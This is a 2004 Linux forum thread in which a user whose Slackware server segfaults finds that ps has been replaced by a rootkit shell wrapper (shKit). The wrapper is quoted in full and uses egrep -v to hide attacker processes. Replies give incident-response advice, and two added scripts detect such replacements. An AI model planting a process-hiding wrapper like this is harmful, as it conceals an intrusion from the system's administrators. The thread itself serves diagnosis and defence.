Old 03-23-2004, 01:50 AM   #1
sakkie
LQ Newbie
 
Registered: Aug 2001
Location: South Africa
Distribution: Slackware 8.0
Posts: 23

Rep: Reputation: 15
segmentation fault


I keep on getting segmentation fault when running commands like ls, df etc...
I am not sure if I am hacked. Does anybody have any idea if this could be caused by somebody hacking me?

Thanks

Sakkie
 
Old 03-23-2004, 03:05 AM   #2
phek
Member
 
Registered: Jul 2001
Location: California, US
Distribution: Slackware
Posts: 196

Rep: Reputation: 30
Sure, anything is possible if someone obtains root to your system, but it's not likely to be the problem. Sounds like you've got some corrupt/missing libs (maybe even a bad hd). I would first try strace'ing the process to hopefully figure out why it's segfaulting. Maybe it's something simple like an unmounted filesystem or something, but it's impossible to diagnose knowing of only 1 of the programs that segfaulted (and not even having any details on that one).
 
Old 03-23-2004, 05:06 AM   #3
sakkie
LQ Newbie
 
Registered: Aug 2001
Location: South Africa
Distribution: Slackware 8.0
Posts: 23

Original Poster
Rep: Reputation: 15
I have found the following code in the ps file:

#!/bin/sh
#
# psX by: syg
/bin/.ps $1 $2 $3 $4 $5 $6 $7 $8 $9 > ~/.pstmp
cat ~/.pstmp|egrep -v "xntps|cround|socklist|7350f|sk|a|apach-scan.1|(swapd)|pscan2|/bin/" >> ~/.pstmp1
mv ~/.pstmp1 ~/.pstmp >> /dev/null 2>&1
cat ~/.pstmp
rm -fr ~/.pstmp > /dev/null 2>&1

I am trying to find more information but if anybody knows about the above code please help?

Thanks
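
Added example (not part of the thread, and not code from any poster): one way to flag the pattern shown in the post above, where a system command has become a shell script and the real binary sits beside it as a dot-hidden file. The function names and the temporary sample directory are this example's own; the sample is a constructed copy of the quoted wrapper.

```shell
#!/bin/sh
# Added example, not from the thread: spot a wrapper replacement like the
# quoted ps script. Function names here are this example's own.

# Print commands in directory $1 that are scripts and have a dot-hidden
# sibling of the same name, as /bin/ps and /bin/.ps do in the post above.
find_wrapped_tools() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        # A genuine ps, ls or df is an ELF binary and never starts with "#!".
        [ "$(head -c 2 "$f" 2>/dev/null)" = "#!" ] || continue
        if [ -f "$1/.${f##*/}" ]; then printf '%s\n' "$f"; fi
    done
    return 0
}

# Print, one per line, the strings a wrapper filters out with grep -v / egrep -v.
hidden_terms() {
    sed -n 's/.*grep -v[[:space:]]*"\([^"]*\)".*/\1/p' "$1" | tr '|' '\n'
}

# Constructed sample: the quoted wrapper, a stand-in for the moved binary,
# and an ordinary script that must not be flagged.
make_sample() {
    mkdir -p "$1"
    cat > "$1/ps" <<'EOF'
#!/bin/sh
/bin/.ps $1 $2 $3 $4 $5 $6 $7 $8 $9 > ~/.pstmp
cat ~/.pstmp|egrep -v "xntps|cround|socklist|7350f|sk|a|apach-scan.1|(swapd)|pscan2|/bin/" >> ~/.pstmp1
EOF
    printf '\177ELF stand-in for the moved binary\n' > "$1/.ps"
    printf '#!/bin/sh\necho ordinary script\n' > "$1/which"
}

sample=$(mktemp -d)
make_sample "$sample"
find_wrapped_tools "$sample"    # lists only the wrapped ps
hidden_terms "$sample/ps"       # lists the ten filter terms
rm -rf "$sample"
```

The extracted list includes the terms `a` and `/bin/`; because `egrep -v` drops every line containing any listed term, this wrapper removes far more of the real ps output than the named tools alone would.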
 
Old 03-23-2004, 05:42 AM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,311
Blog Entries: 54

Rep: Reputation: 2860
> I am not sure if I am hacked. Does anybody have any idea if this could be caused by somebody hacking me?
Without details this is hard to assess. Some rootkits do fsck up. What you need to do is verify your box' integrity, that is users and processes. Verify running services *are* the services you usually run (netstat -anp), verify your system auth files /etc/{passwd,shadow,group} aren't changed, then verify your system login accounting (wtmp,utmp,acct), log files (check /etc/syslog.conf if unsure which log files). Tell-tale signs could be new setuid root files in locations like /tmp or /var/tmp, dirs whose names start with a dot or "...", system binaries owned by other users, insmod errors at boot time, weird loglines in application logs. Please report anomalies you find.


> I keep on getting segmentation fault when running commands like ls, df etc...
Use whatever tools your distro's package manager provides to verify the contents of the packages against a known trusted source like CDs or an FTP mirror. If you've got another box, try compiling Chkrootkit, scp it over and run. Please report anomalies you find.


> sure, anything is possible if someone obtains root to your system, but it's not likely to be the problem.
IMHO you should refrain from saying "not likely" unless you have a thorough understanding of the situation at hand; system compromise is too grave an issue to be nonchalant about.
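
Added example (not part of the thread, and not code from any poster): the file-system tell-tale signs listed in the post above, gathered into one pass with `find`. It assumes the suspect disk is inspected from a trusted rescue system, since the thread shows the box's own tools may be replaced; the `triage` name and the `SETUID`/`DOTDIR`/`OWNER` tags are this example's own.

```shell
#!/bin/sh
# Added example, not from the thread.
# $1: root of the tree to inspect, e.g. the suspect disk mounted read-only
#     under a rescue system (the mount point is up to you).
# $2: uid expected to own system binaries (default 0, i.e. root).
triage() {
    root=${1%/}; owner=${2:-0}
    for d in tmp var/tmp; do
        [ -d "$root/$d" ] || continue
        # setuid files have no business in world-writable temp directories
        find "$root/$d" -xdev -type f -perm -4000 2>/dev/null | sed 's/^/SETUID /'
        # directories named ".something" or "..."; .X11-unix and .ICE-unix
        # are normal on machines running X
        find "$root/$d" -xdev -type d -name '.?*' 2>/dev/null | sed 's/^/DOTDIR /'
    done
    for d in bin sbin usr/bin usr/sbin; do
        [ -d "$root/$d" ] || continue
        # system binaries owned by anyone other than the expected uid
        find "$root/$d" -xdev -type f ! -user "$owner" 2>/dev/null | sed 's/^/OWNER /'
    done
    return 0
}

# Run as: sh triage.sh <root-of-suspect-tree> [expected-owner-uid]
if [ $# -gt 0 ]; then triage "$@"; fi
```

Each hit is a lead to examine by hand, and the pass does not replace verifying packages against trusted media or running Chkrootkit as described above.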
 
Old 03-23-2004, 06:14 AM   #5
sakkie
LQ Newbie
 
Registered: Aug 2001
Location: South Africa
Distribution: Slackware 8.0
Posts: 23

Original Poster
Rep: Reputation: 15
As said, I found the code already mentioned in the previous posting. I also used chkrootkit and found shKit rootkit. I guess my only option is to fdisk and redo the machine.

I found a process xntps which loads at startup.

What would be the best software to monitor any unauthorised access to my server?

Thanks

Isak
 
Old 03-23-2004, 12:45 PM   #6
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,311
Blog Entries: 54

Rep: Reputation: 2860
> As said, I found the code already mentioned in the previous posting. I also used chkrootkit and found shKit rootkit. I guess my only option is to fdisk and redo the machine.
Yes, it is.


> I found a process xntps which loads at startup.
Could be a rogue OpenSSH binary providing a backdoor.


> What would be the best software to monitor any unauthorised access to my server?
Repartition, reformat, reinstall from scratch, run your filesystem integrity scanner, harden the box. Without this any filesystem integrity scanner (Aide, Samhain, tripwire, choice depends on how many hosts you need to check, how trustworthy you want the databases to be and how comfortable you are with configuration) will be useless. Same goes for intrusion detection systems like Snort, Prelude etc.

Last edited by unSpawn; 03-23-2004 at 12:46 PM.
 
Old 03-23-2004, 01:23 PM   #7
phek
Member
 
Registered: Jul 2001
Location: California, US
Distribution: Slackware
Posts: 196

Rep: Reputation: 30
Well, if ps was replaced with that code then someone has obtained root access to your machine. Your best bet is to reinstall. If you want to monitor traffic going to that machine though, I would suggest doing 1 of 2 things.
1) Set up a firewall machine to log all traffic to your machine.
2) Put a hub between your machine and whatever your machine is connected to, then put another machine on that hub and sniff the traffic.
 
Old 03-26-2004, 11:10 PM   #8
kdepa
Member
 
Registered: Feb 2004
Posts: 73

Rep: Reputation: 15
I was having LOTS of problems with SegV faults on my Slackware system, up until about a month ago. Turns out, my system was overclocked just 20 MHz too much. Windows didn't seem to mind, but since Linux almost demands perfection, it had SegV faults. I've read that a few AMD processors contain a bug that can cause SegV faults. Also, if your RAM is running at a clock speed that is too slow, it can drop a bit or two, causing SegV faults.
 